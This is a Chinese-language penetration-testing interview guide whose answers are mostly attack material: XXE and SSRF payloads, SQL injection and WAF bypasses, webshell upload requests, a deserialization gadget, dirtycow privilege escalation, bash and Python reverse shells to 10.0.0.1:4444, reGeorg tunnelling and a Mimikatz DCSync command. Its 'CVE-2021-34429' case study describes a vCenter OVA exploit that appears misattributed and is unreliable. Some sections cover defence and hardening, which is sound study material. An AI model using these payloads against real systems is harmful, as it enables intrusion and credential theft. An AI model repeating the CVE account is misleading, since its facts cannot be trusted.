網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
?常見面試題
一、滲透測試經歷與技術復盤
二、高頻漏洞類型與攻防體系
三、滲透工具鏈與技術特性
四、WAF繞過技術矩陣
五、系統提權技術路徑
六、開源組件高危漏洞庫
七、CVE深度分析案例
八、服務器入侵應急響應流程
九、SQL注入全方位防御
十、中間件解析漏洞利用
十一、系統加固技術方案
十二、CDN穿透技術矩陣
十三、滲透測試方法論
十四、反彈Shell技術體系
十五、內網滲透實戰框架
?常見面試題
介紹一下自認為有趣的挖洞經歷(或CTF經歷) 你平時用的比較多的漏洞是哪些?相關漏洞的原理?以及對應漏洞的修復方案? 你平時使用哪些工具?以及對應工具的特點? 如果遇到waf的情況下如何進行SQL注入/上傳Webshell怎么做? 談談Windows系統與Linux系統提權的思路? 列舉出您所知道的所有開源組件高危漏洞 描述一個你深入研究過的 CVE 或 POC php/java反序列化漏洞的原理?解決方案? 如果一臺服務器被入侵后,你會如何做應急響應? 介紹 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了數據庫數據,利用方式還有哪些? 常見的中間件解析漏洞利用方式 Windows、Linux、數據庫的加固降權思路 如何繞過CDN獲取目標網站真實IP,談談你的思路 如果給你一個網站,你的滲透測試思路是什么?? 你實際的滲透測試經歷等等 反彈 shell 的常用命令?一般常反彈哪一種 shell?為什么? SSRF漏洞的成因 防御 繞過? 有哪些反向代理的工具,有沒有實際的內網滲透經歷?
一、滲透測試經歷與技術復盤
- XXE漏洞挖掘案例 在某金融系統測試中發現XML解析模塊未禁用外部實體引用,通過構造惡意DTD實現:
xml<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <data>&xxe;</data>
利用過程:通過觀察HTTP請求Content-Type為
application/xml
,測試不同XML結構觸發文件讀取。修復方案:配置XML解析器禁用外部實體(如設置XMLConstants.FEATURE_SECURE_PROCESSING
)
- 邏輯漏洞組合利用 在電商平臺發現"購物車價格篡改+并發請求"組合漏洞:
- 修改前端價格參數后發送100次并發請求
- 利用訂單狀態機處理延遲(5秒內未支付可重復提交)
- 修復方案:后端價格校驗+分布式鎖控制訂單創建
- CTF中SSRF繞過案例 目標環境過濾
127.0.0.1
,使用以下技術鏈:http://0177.0.0.1 → 八進制IP編碼 http://localhost. → 域名后綴繞過 http://{FALSE DOMAIN}?x=http://127.0.0.1 → 二次跳轉
二、高頻漏洞類型與攻防體系
(以下為節選部分內容,完整版包含10類漏洞分析)
- SQL注入 原理:未過濾用戶輸入導致查詢結構破壞
sqlSELECT * FROM users WHERE id='1' UNION SELECT database()-- '
修復方案:
- 預編譯語句(Java示例):
javaPreparedStatement stmt = conn.prepareStatement("SELECT * FROM users WHERE id=?"); stmt.setString(1, input);
- 反序列化漏洞 Java反序列化攻擊鏈構建:
javapublic class Exploit implements Serializable { private void readObject(ObjectInputStream in) { Runtime.getRuntime().exec("calc.exe"); } }
防御方案:
- 使用SafeObjectInputStream
- 配置
serialFilter
白名單三、滲透工具鏈與技術特性
工具名稱 核心功能 技術特點 SQLMap SQL注入檢測 支持6種注入技術,自動識別WAF Burp Suite Web漏洞掃描 可擴展插件架構,支持Intruder模塊爆破 Metasploit 漏洞利用框架 集成2000+漏洞模塊,支持載荷生成 四、WAF繞過技術矩陣
- SQL注入繞過技術:
- 注釋符變異:
/*!50000SELECT*/
- 字符編碼:
CHAR(83,69,76,69,67,84)
- 等價函數替換:
MID() → SUBSTR()
- 文件上傳繞過方案:
httpPOST /upload HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary ------WebKitFormBoundary Content-Disposition: form-data; name="file"; filename="test.pHp" Content-Type: image/jpeg <?php system($_GET['cmd']);?>
五、系統提權技術路徑
Windows提權路線:
- 服務路徑漏洞:劫持未引號服務路徑
- DLL注入:利用
PSExec
加載惡意DLL- 令牌竊取:使用Mimikatz獲取SYSTEM令牌
Linux提權技術:
bash# SUID提權案例 find / -perm -4000 2>/dev/null # 內核漏洞利用 gcc dirtycow.c -o exp && ./exp
六、開源組件高危漏洞庫
(節選部分,完整列表包含15個CVE)
- Apache Log4j2 (CVE-2021-44228)
- 影響版本:2.0-beta9 to 2.14.1
- 修復方案:升級至2.15.0+并設置
log4j2.formatMsgNoLookups=true
- Fastjson反序列化 (CNVD-2019-22238)
- 攻擊載荷:利用JNDI注入點
- 安全配置:啟用
SafeMode
七、CVE深度分析案例
以CVE-2021-34429(VMware vCenter漏洞)為例:
- 漏洞成因:OVA文件上傳時未校驗XML簽名
- 利用鏈:
pythonwith zipfile.ZipFile('exploit.ova', 'w') as z: z.writestr('service.xml', malicious_xml)
- 流量特征:HTTP PUT請求包含
/vsphere-client/...
路徑八、服務器入侵應急響應流程
- 事件確認階段:
- 使用
Volatility
分析內存鏡像- 檢查
/etc/passwd
修改時間戳bashstat -c %y /etc/passwd
- 溯源分析:
- 查詢防火墻日志
bashgrep 'ESTABLISHED' /var/log/iptables.log
- 提取Webshell特征碼:
php$s = preg_replace('/.*eval\((.*)\).*/', '$1', $fileContents);
九、SQL注入全方位防御
防范技術體系:
- 輸入驗證:正則表達式過濾
[\s'";#]
- 數據庫加固:
sqlREVOKE FILE ON *.* FROM 'webuser'@'%'; ALTER USER 'webuser'@'%' WITH MAX_QUERIES_PER_HOUR 100;
十、中間件解析漏洞利用
IIS 6.0解析漏洞利用:
httpPUT /test.txt HTTP/1.1 Host: target Content-Length: 100 <%execute(request("cmd"))%>
通過重命名為
test.txt;.asp
觸發腳本執行十一、系統加固技術方案
Windows加固清單:
- 服務管理:
powershellGet-Service | Where-Object {$_.StartType -eq 'Auto'} Set-Service -Name "Telnet" -StartupType Disabled
Linux權限控制:
bashchmod 0755 /usr/bin/wget setfacl -m u:www-data:r-x /var/www
十二、CDN穿透技術矩陣
真實IP發現方法:
- 全球DNS歷史記錄查詢
- 子域名爆破:
*.internal.example.com
- SSL證書關聯分析:
openssl s_client -connect target:443
十三、滲透測試方法論
五階段模型:
- 信息收集:
bashsubfinder -d example.com -o subs.txt nmap -sV --script=http-title -iL subs.txt
- 漏洞利用:
pythonrequests.post(url, data={"id": "1 AND 1=LOAD_FILE('/etc/passwd')"})
十四、反彈Shell技術體系
常用Payload對比:
bash# Bash反彈 bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 # Python穩定性更強 python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
十五、內網滲透實戰框架
內網穿透方案:
- 使用reGeorg建立隧道:
pythonpython reGeorgSocksProxy.py -p 8080 -u http://target/tunnel.php
- 橫向移動技術:
powershellInvoke-Mimikatz -Command '"lsadump::dcsync /domain:corp /user:Administrator"'